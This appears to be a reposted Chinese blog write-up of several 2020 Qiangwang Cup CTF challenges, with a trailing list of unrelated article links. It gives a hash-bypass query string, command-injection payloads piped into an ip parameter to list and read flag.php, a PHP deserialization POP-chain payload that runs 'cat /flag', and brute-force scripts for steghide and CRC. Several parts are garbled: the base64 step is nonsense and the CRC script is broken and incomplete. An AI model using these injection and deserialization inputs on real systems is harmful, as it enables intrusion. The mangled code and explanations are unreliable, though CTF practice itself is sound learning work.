博客
关于我
2020强网杯部分题目复现
阅读量:688 次
发布时间:2019-03-17

本文共 2146 字,大约阅读时间需要 7 分钟。

强网先锋

Funhash

为绕过第一关,我们需要找到一个特殊字符串,该字符串在MD4加密后仍与自身相等。这类特殊字符串被称为密闭映射(Funny Hash的前缀)。常规方法如暴破较为缓慢,因此我放弃了这一选择。在网上搜索(并将搜索引擎语言设置为汉卡),发现相关知识点。最终发现了这个特殊字符串:0e251288019

将该字符串作为hash1提交即可绕过第一关,随后其他两个关卡也相对简单。

绕过方法:

?hash1=0e251288019&hash2[]=2&hash3[]=3&hash4=ffifdyop

主动

关卡考察对象是命令执行 vulnerability。通过提交IP参数 bypass.FLAG check后,利用ping命令获取远程设备信息.

绕过方法:

?ip=127.0.0.1|ls

由于空格被过滤,通过%20替换空格提交:

?ip=127.0.0.1|cat%20flag.php

访问preg_match函数后,发现flag.php源码中包含flag信息。


upload

分析题目附件中的数据包,使用Wireshark分析HTTP请求对象,导出相关文件。flag.php文件中的表单提交动作指向steghide.php。flag的位置在注释中,可以通过判断密码质量进行分析。

解题方法:

  • 找到注释中的好密码。
  • 使用steghide工具解题,推荐使用脚本进行自动化破解:
  • #!/bin/bashfor line in `cat $2`;do    steghide extract -sf $1 -p $line > /dev/null 2>&1    if [[ $? -eq 0 ]];then        echo 'password is: '$line        exit    fidone

    web辅助

    这类题目考察pop链 vulnerable。通过分析类方法__construct, __toString等,实现对flag的获取。

    构造pop的链路:

  • topsolo类实例化时触发__construct,返回midsolo对象。
  • midsolo对象触发__construct,返回jungle对象。
  • jungle对象的__toString方法执行cat /flag,从而获取flag。
  • payload示例:

    $lol = new topsolo();print_r(serialize($lol));

    输出结果为:

    O:7:"topsolo":1:{    s:7:"%00*%00name";    O:7:"midsolo":1:{        s:7:"%00*%00name";        O:6:"jungle":1:{            s:7:"%00*%00name";            s:7:"Lee Sin";        }    }}

    计算机

    套娃题,第一关通过查看请求路径找到/fonts/1,下载相关字体文件,提取其中的base64字符串。

    解题方法:

  • 复制base64字符串:
  • i = 'AIzaTransit`base64_decode(i)
    1. 使用工具解密,获取flag。

    2. CRC爆破

      最后关卡是一个CRC绕过问题。通过逐次暴破循环校验和,找到原始明文。

      脚本示例:

      import binasciidef find_crc():    # binary string length    len_sequences = 0x10000    # CRC-32 dictionary    dict = string.printable    # example: crc1 = 0x9aeacc13, crc2 = 0xeed7e184, crc3 = 0x289585af    if not find:        returnprint("Successfully found CRC值:", found_password)def CrackCrc5(crc):    for i in dict:        for j in dict:            for p in dict:                for q in dict:                    for h in dict:                        s = i + j + p + q + h                        if crc == binascii.crc32(s.encode("ascii")):                            print(s)                            return CrackCrc5(crc1) CrackCrc4(crc2) CrackCrc5(crc3)

      总结

      此次比赛让我学到了许多新知识,尤其是pop链和隐写技术的处理。此外,通过多个bucket工具的学习,进一步加深了对安全领域的理解。未来将继续积累相关经验,争取在接下来的比赛中取得更好的成绩!

    转载地址:http://dtshz.baihongyu.com/

    你可能感兴趣的文章
    mysql CPU使用率过高的一次处理经历
    查看>>
    Multisim中555定时器使用技巧
    查看>>
    MySQL CRUD 数据表基础操作实战
    查看>>
    multisim变压器反馈式_穿过隔离栅供电:认识隔离式直流/ 直流偏置电源
    查看>>
    mysql csv import meets charset
    查看>>
    multivariate_normal TypeError: ufunc ‘add‘ output (typecode ‘O‘) could not be coerced to provided……
    查看>>
    MySQL DBA 数据库优化策略
    查看>>
    multi_index_container
    查看>>
    mutiplemap 总结
    查看>>
    MySQL Error Handling in Stored Procedures---转载
    查看>>
    MVC 区域功能
    查看>>
    MySQL FEDERATED 提示
    查看>>
    mysql generic安装_MySQL 5.6 Generic Binary安装与配置_MySQL
    查看>>
    Mysql group by
    查看>>
    MySQL I 有福啦,窗口函数大大提高了取数的效率!
    查看>>
    mysql id自动增长 初始值 Mysql重置auto_increment初始值
    查看>>
    MySQL in 太多过慢的 3 种解决方案
    查看>>
    Mysql Innodb 锁机制
    查看>>
    MySQL InnoDB中意向锁的作用及原理探
    查看>>
    MySQL InnoDB事务隔离级别与锁机制深入解析
    查看>>